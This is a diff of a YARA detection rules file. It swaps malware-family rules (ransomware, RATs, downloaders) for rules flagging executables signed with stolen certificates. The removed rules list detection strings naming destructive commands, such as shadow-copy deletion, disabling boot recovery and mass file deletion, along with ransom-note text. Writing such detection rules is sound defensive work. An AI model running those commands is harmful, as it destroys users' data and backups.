+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5019-L5042"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1296-L1307"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "15897144843acf49b81c5428fd1bb56d7a2acf16047a6e5d3ca4f2aaa8891577"
+		logic_hash = "69910c81ce85bc59972b644f548a4382b8f3b70ec2737ada9da7adcb4779ce9c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$hr1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
-		$hr2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
-		$hr3 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii
-		$hr4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
-		$hr5 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" ascii
-		$hr6 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
-		$hx1 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii
-		$hx2 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
-		$hx3 = "227375626964223A22" ascii
-		$hx4 = "226E6574776F726B223A22" ascii
-		$hx5 = "726561646D652E747874" ascii
-		$hx6 = "-nolan" fullword wide
-		$o1 = { 8d 45 e9 89 9d 54 ff ff ff 88 9d 44 ff ff ff 3b }
-		$o2 = { 8b 44 24 2? 8b ?c 24 34 40 8b 54 24 38 89 44 24 }
-		$o3 = { 8b 44 24 2? 8b ?c 24 1c 89 44 24 34 8b 44 24 28 }
-		$o4 = { 8b 44 24 2? 8b ?c 24 34 05 00 00 a0 00 89 44 24 }
+		thumbprint = "21dacc55b6e0b3b0e761be03ed6edd713489b6ce"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $hx* ) or ( 2 of ( $hr* ) and 2 of ( $hx* ) ) or ( all of ( $o* ) and 2 of ( $h* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC Mail.Ru" and pe.signatures [ i ] . serial == "0d:eb:00:4e:56:d7:fc:ec:1c:aa:8f:29:28:d4:e7:68" )
 }
-rule DITEKSHEN_MALWARE_Win_Wobbychipmbr : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7Bd36898217B4Cc6B6427Dd7C361E43D : FILE
 {
 	meta:
-		description = "Detects WobbyChipMBR / Covid-21 ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "581fbce1-128d-5323-a259-14d9bfdf09b1"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ff5be4ad-9471-5d9f-a1ad-ed7aca345a7f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5044-L5060"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1309-L1320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "168c7f610625131c9552252d2b824a90918d2961996ee0f783497dff5cf17351"
+		logic_hash = "9ff149b5a12e154c0ede5015a0432fb70d6001507356c006952e8db91afaa72d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "You became a Victim of the Covid-21 Ransomware" ascii wide
-		$x2 = "Reinstalling Windows has been blocked" ascii wide
-		$x3 = "Enter Decryption Key:" ascii wide
-		$x4 = "encrypted with military grade encryption" ascii wide
-		$s1 = "schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR" ascii
-		$s2 = "\\EFI\\Boot\\bootx64.efi" ascii wide
-		$s3 = "DumpHex" fullword ascii
-		$s4 = "TFTP Error" fullword wide
-		$s5 = "HD(Part%d,MBRType=%02x,SigType=%02x)" fullword wide
+		thumbprint = "c55df31aa16adb1013612ceb1dcf587afb7832c3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aeafefcafbafbaf" and pe.signatures [ i ] . serial == "7b:d3:68:98:21:7b:4c:c6:b6:42:7d:d7:c3:61:e4:3d" )
 }
-rule DITEKSHEN_MALWARE_Win_Snatch : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02D17Fbf4869F23Fea43C7863902Df93 : FILE
 {
 	meta:
-		description = "Detects Snatch / GoRansome / MauriGo ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "00dce673-b909-571f-8117-c5d4ce73fb31"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6e96f5b2-f3de-5d5a-babe-d46b9e3edd3e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5062-L5091"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1322-L1333"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf8c33a7203458c80a43944c3117bb897b1702f0024271904d9be682cbd695fc"
+		logic_hash = "a66e10934cc58e364a694dde3865d0de33e61ce0128ef144c61fa5728d22b8f8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.encryptFile" ascii
-		$s2 = "main.encryptFileExt" ascii
-		$s3 = "main.deleteShadowCopy" ascii
-		$s4 = "main.Shadow" fullword ascii
-		$s5 = "main.RecoverMe" fullword ascii
-		$s6 = "main.EncryptWithPublicKey" ascii
-		$s7 = "main.EncoderLookupDir" fullword ascii
-		$s8 = "main.ALIGNUP" fullword ascii
-		$s9 = "main.encrypt" fullword ascii
-		$s10 = "github.com/mauri870/ransomware" ascii
-		$m1 = "Dear You, ALl Your files On YOUR network computers are encrypted" ascii
-		$m2 = "You have to pay the ransom of %s USD in bitcoins to the address" ascii
-		$m3 = "REMEMBER YOU FILES ARE IN SAVE HANDS AND WILL BE RESTORED OR RECOVERED ONCE PAYMENT IS DONE" ascii
-		$m4 = ":HELP FEEED A CHILD:" ascii
-		$m5 = ">SYSTEM NETWORK ENCRYPTED<" ascii
-		$m6 = "YOUR IDENTIFICATION : %s" ascii
-		$m7 = "convince you of our honesty" ascii
-		$m8 = "use TOR browser to talk with support" ascii
-		$m9 = "encrypted and attackers are taking" ascii
-		$p1 = "/Go/src/kitty/kidrives/" ascii
-		$p2 = "/LGoGo/encoder.go" ascii nocase
-		$p3 = "/Go/src/kitty/kidata/" ascii
+		thumbprint = "d336ff8d8ccb771943a70bb4ba11239fb71beca5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 2 of ( $m* ) or ( 1 of ( $m* ) and 1 of ( $s* ) ) or ( all of ( $p* ) and ( 1 of ( $s* ) or 1 of ( $m* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Windows" and pe.signatures [ i ] . serial == "02:d1:7f:bf:48:69:f2:3f:ea:43:c7:86:39:02:df:93" )
 }
-rule DITEKSHEN_MALWARE_Win_Meteorite : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1E74Cfe7De8C5F57840A61034414Ca9F : FILE
 {
 	meta:
-		description = "Detects Meteorite downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "ce7a72ce-56a8-5def-a952-f0b08efe8a4a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b46992d5-f4fb-5e51-8f3c-eb87d4397f14"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5093-L5109"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1335-L1346"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0ae8183d949046be4257b48571a266f2501d60dd302f511ca1a2d518884e6a7f"
+		logic_hash = "14f57732a82b5139059bbe6f713184659187b57419d79e85a12ab197def4b761"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "MeteoriteDownloader" fullword ascii wide
-		$x2 = "Meteorite Downloader" fullword ascii wide
-		$x3 = "Meteorite Downloader v" wide
-		$s1 = "regwrite" fullword wide
-		$s2 = "urlmon" fullword ascii
-		$s3 = "wscript.shell" fullword wide
-		$s4 = "modMain" fullword ascii
-		$s5 = "VBA6.DLL" fullword ascii
-		$s6 = "^_http" ascii
+		thumbprint = "2dfa711a12aed0ace72e538c57136fa021412f95951c319dcb331a3e529cf86e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insta Software Solution Inc." and pe.signatures [ i ] . serial == "1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" )
 }
-rule DITEKSHEN_MALWARE_Win_Legionlocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009272607Cfc982B782A5D36C4B78F5E7B : FILE
 {
 	meta:
-		description = "Detects LegionLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "4e5c50d0-808e-5adb-bce9-804ddf66ca61"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "dfb01400-dff2-5df1-b38e-7eb2ee2c71b8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5111-L5129"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1348-L1359"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2da897b5603415f14fff134b3a94d77e6963da79e117d26ba16e6b04e45f4045"
+		logic_hash = "d1c2b44e782befc8dae6852935b6f5b0071c13dd9b56857c38cb290c9069df18"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$m1 = "+Do not run task manager, powershell, cmd etc." ascii wide
-		$m2 = "3 hours your files will be deleted." ascii wide
-		$m3 = "files have been encrypted by Legion Locker" ascii wide
-		$s1 = "passwordBytes" fullword ascii
-		$s2 = "_start_enc_" ascii
-		$s3 = "_del_desktop_" ascii
-		$s4 = "Processhacker" wide
-		$s5 = "/k color 47 && del /f /s /q %userprofile%\\" wide
-		$s6 = "Submit code" fullword wide
-		$pdb1 = "\\obj\\Debug\\LegionLocker.pdb" ascii
-		$pdb2 = "\\obj\\Release\\LegionLocker.pdb" ascii
+		thumbprint = "2514c615fe54d511555bc5b57909874e48a438918a54cea4a0b3fbc401afa127"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $m* ) or 1 of ( $pdb* ) or 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rada SP Z o o" and pe.signatures [ i ] . serial == "00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagentgo : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7B91468122273Aa32B7Cfc80C331Ea13 : FILE
 {
 	meta:
-		description = "Detects Go-based downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e16ccb89-2eb6-5457-a88e-f802f3c35764"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4369d88d-f592-5a5a-bdf6-c63b77d45326"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5131-L5144"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1361-L1372"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9dd2446eddff18be00feb34d8911600feb395a9ce2566786d42b48b444230d0"
+		logic_hash = "4c0fa18edb23c6a7474185adc67101ad9b13c71188f25612165cb97d236562d8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.downloadFile" fullword ascii
-		$s2 = "main.fetchFiles" fullword ascii
-		$s3 = "main.createDefenderAllowanceException" fullword ascii
-		$s4 = "main.unzip" fullword ascii
-		$s5 = "HideWindow" fullword ascii
-		$s6 = "/go/src/installwrap/main.go" ascii
+		thumbprint = "409f32dc91542546e7c7f85f687fe3f1acffdd853657c8aa8c1c985027f5271d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" )
 }
-rule DITEKSHEN_MALWARE_Win_Blackmoon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0082Cb93593B658100Cdd7A00C874287F2 : FILE
 {
 	meta:
-		description = "Detects executables using BlackMoon RunTime"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "76071d36-3d2d-589c-8c3f-0ae60e69996e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3e618656-6c9d-5172-bad4-f507cec1dc0c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5146-L5155"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1374-L1385"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "05bfde8ec3a469df5707c195e25995ac6af730e8a1595b1a598276c024420be2"
+		logic_hash = "df8eb4feef3992bae7097a05860f57a1408fc79d92741e3ea2f202d072d9f47e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "blackmoon" fullword ascii
-		$s2 = "BlackMoon RunTime Error:" fullword ascii
+		thumbprint = "d168d7cf7add6001df83af1fc603a459e11395a9077579abcdfd708ad7b7271f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sportsonline24 B.V." and pe.signatures [ i ] . serial == "00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" )
 }
-rule DITEKSHEN_MALWARE_Win_Iceid : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Df683D46D8C3832489672Cc4E82D3D5D : FILE
 {
 	meta:
-		description = "Detects IceID / Bokbot variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "0da94737-0f82-5892-a0eb-f9f3c0a114cc"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "532ee72a-00f6-513e-b4f9-0827f77d643e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5157-L5176"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1387-L1398"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "204b4c297806a36ca14bb3e659824f4eb49b18308af7090f0db1194705f1e2c9"
+		logic_hash = "153fdb25769d912732a1fb4ecc757fc8c7e4766cd6588ea16d9cf642b4be8bf6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$n1 = "POST" fullword wide
-		$n2 = "; _gat=" fullword wide
-		$n3 = "; _ga=" fullword wide
-		$n4 = "; _u=" fullword wide
-		$n5 = "; __io=" fullword wide
-		$n6 = "; _gid=" fullword wide
-		$n7 = "Cookie: __gads=" fullword wide
-		$s1 = "c:\\ProgramData" ascii
-		$s2 = "loader_dll_64.dll" fullword ascii
-		$s3 = "loader_dll_32.dll" fullword ascii
-		$s4 = "/?id=%0.2X%0.8X%0.8X%s" ascii
-		$s5 = "%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.8X" ascii
+		thumbprint = "8b63c5ea8d9e4797d77574f35d1c2fdff650511264b12ce2818c46b19929095b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $n* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $n* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osatokio Oy" and pe.signatures [ i ] . serial == "00:df:68:3d:46:d8:c3:83:24:89:67:2c:c4:e8:2d:3d:5d" )
 }
-rule DITEKSHEN_MALWARE_Win_Purge : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_105440F57E9D04419F5A3E72195110E6 : FILE
 {
 	meta:
-		description = "Detects Purge ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b3fb9f38-ce12-5e0e-8908-3379b5da3497"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "44600134-156b-5762-bdae-f4c016f454a3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5178-L5201"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1400-L1411"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "83d13eca69bc99539e47d6d29689edf2a4fcd2260c6e909582126a490eef8115"
+		logic_hash = "f8b7aebe91466a587dac366cf6483586f22f95ebc186aa139e55c6e52d276f63"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$n1 = "imagesave/imagesize.php" ascii
-		$n2 = "imageinfo.html" ascii
-		$n3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" ascii
-		$n4 = "Content-Type: application/x-www-form-urlencoded" ascii
-		$m1 = "YOUR_ID: %x%x" wide
-		$m2 = "Specially for your PC was generated personal" wide
-		$m3 = "which is on our Secret Server" wide
-		$m4 = "wait for a miracle and get your price" wide
-		$s1 = "%s\\SpyHunter Remove Ransomware" wide
-		$s2 = "$recycle.bin" fullword wide
-		$s3 = "TheEnd" fullword wide
-		$s4 = "%s\\HELP_DECRYPT_YOUR_FILES.TXT" fullword wide
-		$s5 = "%s.id_%x%x_email_" wide
-		$s6 = "scmd" fullword wide
-		$s7 = "process call create \"%s\"" wide
-		$s8 = "FinishEnds" fullword ascii
+		thumbprint = "e95c7b4f2e5f64b388e968d0763da67014eb3aeb8c04bd44333ca3e151aa78c2"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $n* ) or 2 of ( $m* ) or ( 3 of ( $s* ) and ( 1 of ( $n* ) or 1 of ( $m* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CRYPTOLAYER SRL" and pe.signatures [ i ] . serial == "10:54:40:f5:7e:9d:04:41:9f:5a:3e:72:19:51:10:e6" )
 }
-rule DITEKSHEN_MALWARE_Win_Njrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C01E41Ff29078E6626A640C5A19A8D80 : FILE
 {
 	meta:
-		description = "Detects NjRAT / Bladabindi / NjRAT Golden"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "078dea64-8f95-5939-a1fb-c0a888adcf0d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "93ee927f-71bd-5490-8f70-5486ee9c3b79"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5203-L5220"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1413-L1424"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "92d535a7c7f361b7a0901d0b99427ebc82a69577bfea73c04a7f9d51d2054b36"
+		logic_hash = "1ee6f365d46fb1ee0e448fc0ab9d07c51a46f6ee95155094ec956f1cad6c1052"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = /Njrat\s\d+\.\d+\sGolden\s/ wide
-		$s1 = /\sfirewall\s(add|delete)\sallowedprogram/ wide
-		$s2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 (63|6b) 00 20 00 70 00 69 00 6e 00 67 }
-		$s3 = "Execute ERROR" wide
-		$s4 = "Download ERROR" wide
-		$s5 = "[kl]" fullword wide
-		$s6 = "UploadValues" fullword wide
-		$s7 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
-		$s8 = "HideM" fullword wide
-		$s9 = "No Antivirus" fullword wide
+		thumbprint = "cca4a461592e6adff4e0a4458ebe29ee4de5f04c638dbd3b7ee30f3519cfd7e5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BurnAware" and pe.signatures [ i ] . serial == "c0:1e:41:ff:29:07:8e:66:26:a6:40:c5:a1:9a:8d:80" )
 }
-rule DITEKSHEN_MALWARE_Win_Darktrackrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fa3Dcac19B884B44Ef4F81541184D6B0 : FILE
 {
 	meta:
-		description = "Detects OzoneRAT / DarkTrack / DarkSky"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "ef8675f8-f643-5948-a967-e4a9ce5ab89e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a188e033-4381-5ff0-8f54-f36571ae7097"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5222-L5245"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1426-L1437"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a831c0f7707864d8c9e9fa338085a52933869d8cfbdbe0d12715da301c12646"
+		logic_hash = "7e9e2b22f6f2cfd5d7c962fb43c85d703d0a600f954f614073c708f4b881d90e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Klog.dat" ascii
-		$x2 = "I_AM_DT" ascii
-		$x3 = " Alien" ascii
-		$x4 = "Local Victim" ascii
-		$x5 = "Dtback\\AlienEdition\\Server\\SuperObject.pas" ascii
-		$x6 = "].encryptedUsername" ascii
-		$x7 = "].encryptedPassword" ascii
-		$x8 = { 49 41 4d [6] 44 41 52 [0-2] 4b [6] 44 54 41 43 4b }
-		$s1 = "AntiVirusProduct" ascii
-		$s2 = "AntiSpywareProduct" ascii
-		$s3 = "ConnectServer" ascii
-		$s4 = "ExecQuery" ascii
-		$s5 = "\\Drivers\\Etc\\Hosts" fullword ascii
-		$s6 = "BTMemoryLoadLibary: Get DLLEntyPoint" ascii
-		$s7 = "\\\\.\\SyserDbgMsg" fullword ascii
-		$s8 = "\\\\.\\SyserBoot" fullword ascii
+		thumbprint = "6557117e37296d7fdcac23f20b57e3d52cabdb8e5aa24d3b78536379d57845be"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unicom Ltd" and pe.signatures [ i ] . serial == "00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" )
 }
-rule DITEKSHEN_MALWARE_Win_Godzilla : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_70E1Ebd170Db8102D8C28E58392E5632 : FILE
 {
 	meta:
-		description = "Detects Godzilla loader"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "3384b844-6abf-5f94-a62b-7ebbdfe321bd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f5ccfbdd-d72d-5060-84e6-0ab8477f73fe"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5247-L5265"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1439-L1450"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ff87fbaaf488ac69e06a03a7f8e5305ec114caa6271c25fa130033f50f0d9095"
+		logic_hash = "b639424c97fb1da440c458cf5cb8f04562292284db7b576c0676a632704f597b"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "90d67006be03f2254e1da76d4ea7dc24372c4f30b652857890f9d9a391e9279c"
+		importance = 20
 
-	strings:
-		$x1 = "MSVBVM60.DLL" fullword ascii
-		$x2 = "Loginserver8" fullword ascii
-		$x3 = "Proflogger7" fullword ascii
-		$s1 = "Badgeless5" fullword ascii
-		$s2 = "Montebrasite3" fullword ascii
-		$s3 = "Atelomyelia4" fullword ascii
-		$s4 = "Xxencoded5" fullword ascii
-		$s5 = "Garneau2" fullword ascii
-		$s6 = "Hypostasis0" fullword ascii
-		$s7 = "Piarhemia4" fullword ascii
-		$s8 = "Foredestine8" fullword ascii
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Equal Cash Technologies Limited" and pe.signatures [ i ] . serial == "70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6Cfa5050C819C4Acbb8Fa75979688Dff : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		author = "ditekSHen"
+		id = "35673979-5578-5d32-b8f9-9e74f0c336a2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1452-L1463"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "e5978deb84a0c6cee9132f8806f239f33478462da31a423a04922c195cbd343a"
+		score = 75
+		quality = 75
+		tags = "FILE"
